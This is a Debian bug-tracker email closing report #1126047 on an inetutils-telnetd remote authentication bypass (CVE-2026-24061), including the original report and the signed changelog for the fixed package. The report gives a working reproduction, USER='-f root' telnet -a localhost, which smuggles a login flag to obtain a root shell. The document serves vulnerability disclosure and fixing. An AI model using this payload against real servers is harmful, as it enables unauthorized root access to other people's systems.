Your message dated Sat, 24 Jan 2026 11:03:57 +0000
with message-id <[email protected]>
and subject line Bug#1126047: fixed in inetutils 2:2.6-3+deb13u1
has caused the Debian Bug report #1126047,
regarding inetutils-telnetd: remote authentication bypass (CVE-2026-24061)
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1126047: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126047
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: inetutils-telnetd
Version: 2:2.7-1
Severity: grave
Justification: user security hole
From
https://seclists.org/oss-sec/2026/q1/89
root@kaka:~ sudo apt-get install inetutils-telnetd telnet
root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
root@kaka:~ sudo /etc/init.d/inetutils-inetd start
root@kaka:~ USER='-f root' telnet -a localhost
...
root@kaka:~#
-- System Information:
Debian Release: forky/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 6.17.13+deb14-amd64 (SMP w/12 CPU threads; PREEMPT)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8),
LANGUAGE=en_CA:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages inetutils-telnetd depends on:
pn inetutils-inetd | inet-superserver <none>
ii libc6 2.42-9
ii libcom-err2 1.47.2-3+b8
ii libk5crypto3 1.22.1-2
ii libkrb5-3 1.22.1-2
ii libtinfo6 6.6+20251231-1
ii login 1:4.16.0-2+really2.41.3-2
ii netbase 6.5
ii systemd-sysv 259-1
inetutils-telnetd recommends no packages.
inetutils-telnetd suggests no packages.
--- End Message ---
--- Begin Message ---
Source: inetutils
Source-Version: 2:2.6-3+deb13u1
Done: Guillem Jover <[email protected]>
We believe that the bug you reported is fixed in the latest version of
inetutils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Guillem Jover <[email protected]> (supplier of updated inetutils package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 21 Jan 2026 17:37:32 +0100
Source: inetutils
Architecture: source
Version: 2:2.6-3+deb13u1
Distribution: trixie-security
Urgency: high
Maintainer: Guillem Jover <[email protected]>
Changed-By: Guillem Jover <[email protected]>
Closes: 1126047
Changes:
inetutils (2:2.6-3+deb13u1) trixie-security; urgency=high
.
* Fix remote authentication bypass in telnetd.
GNU InetUtils Security Advisory:
<https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html>
Fixes CVE-2026-24061. (Closes: #1126047)
Checksums-Sha1:
992e925111e1e3972687d1cd9d2ec51b2e918ee9 3265 inetutils_2.6-3+deb13u1.dsc
af51b509faa1fe386e98c0e12371d7021885e798 1764528 inetutils_2.6.orig.tar.xz
93710d3c3117078de4496a16f2131c3f5ff61d4d 1223 inetutils_2.6.orig.tar.xz.asc
12cb2468de91943fa1ae89e7b35d49fae338a66a 79768
inetutils_2.6-3+deb13u1.debian.tar.xz
c23740dd3e1c746a12a9041b651f36fbab4f2622 13762
inetutils_2.6-3+deb13u1_amd64.buildinfo
Checksums-Sha256:
89e01f4eed89a0f9c184713e471151751ae8137b0b0163a1934c26261b467ef2 3265
inetutils_2.6-3+deb13u1.dsc
68bedbfeaf73f7d86be2a7d99bcfbd4093d829f52770893919ae174c0b2357ca 1764528
inetutils_2.6.orig.tar.xz
2438861e2eccf5faf5dba7b83b6b9f6bc7ee83a812315edaa1479342a90adaa7 1223
inetutils_2.6.orig.tar.xz.asc
3733a8abdf4f414994834aa205110bb672e1433287e64789dcca27ab68fb98e2 79768
inetutils_2.6-3+deb13u1.debian.tar.xz
3ceff8f5804cd6835a6384af966418407bbb38b91f449aa304746cbd040aea61 13762
inetutils_2.6-3+deb13u1_amd64.buildinfo
Files:
c725f4de29e4e8e6f7c3ad014ce99828 3265 net optional inetutils_2.6-3+deb13u1.dsc
401d7d07682a193960bcdecafd03de94 1764528 net optional inetutils_2.6.orig.tar.xz
48fbf0784119520fd03ff3b6a6f23d83 1223 net optional
inetutils_2.6.orig.tar.xz.asc
e1992ba9b48c40901f918ea8dd43ef58 79768 net optional
inetutils_2.6-3+deb13u1.debian.tar.xz
a1b6780864972cbb5f3034949cff791d 13762 net optional
inetutils_2.6-3+deb13u1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
wsG7BAEBCgBvBYJpcR5KCRC5cr8+pK5Xo0cUAAAAAAAeACBzYWx0QG5vdGF0aW9u
cy5zZXF1b2lhLXBncC5vcmfIX5Hjt0CTsRCceniK4bAblZgSuoFot0bgZhp22Umz
IhYhBE8+dPQ2BQwQ9WlldLlyvz6krlejAAAbxBAAuDAO1lEBrrHQufiVEBgZSV1s
0PA2lNSV2n/d2DlDpEfPluzv6sYlXe9VAmnB2mV3X3llto4m4jpSs53sVD3fnP63
EiYeI/dzAZ9gYiJtt2qWBlBhNRZe18BiQxQFRiPE/J1B0xCGb5udFkJLm8IzDXPM
4YLpQJALRKxhVBM4DlfPZgPUC/aZyesd/diWM90zLBgsLIuvrlG3dY6bGgSwzbO0
kbVCTxq+bGS8fwYE1d4ryG9wuItO3yQOSFrIq086pcp53Ri3r+62OzpZnMrzFt8R
MJqZCAqG0sCM3uZzPZyet4zdwop4fBPTtjbMjXcRBeM2m78ik21fO9Xh5IVstznX
XNsT2KYR1wqVbD8dFbTAEeL9YdrpyJaN0IhVB+YHPpHnx96euJ4nLxmwjNJoKi9v
TZsOJ4vaHxW5FnI8ykc3BwIcLrFaqyqoFt/PnCkctf+V3QkvYpyPV+VFM2GzIqgr
+7ifwX0yj3wdZMW5Jof0u5EuoeARcEjZPhODeuvGRmIlZ0RCwSbvd8mskizsruFP
D23eS8hRys7Fc/RBzhvCwqHT0cDfj8HtNL6cvZab5dgAU2XTnm7ZQ+Sqpsut5u5g
iVMuD0ATpXqI5Zts0fIqhHUgUFNrn9vw6fly0oBHZGJct0AEzdxskcQkaQMH8Wvo
2HuCEln2wMZCuQEeHvw=
=Pg5i
-----END PGP SIGNATURE-----
pgpq8a2TH3pZV.pgp
Description: PGP signature
--- End Message ---
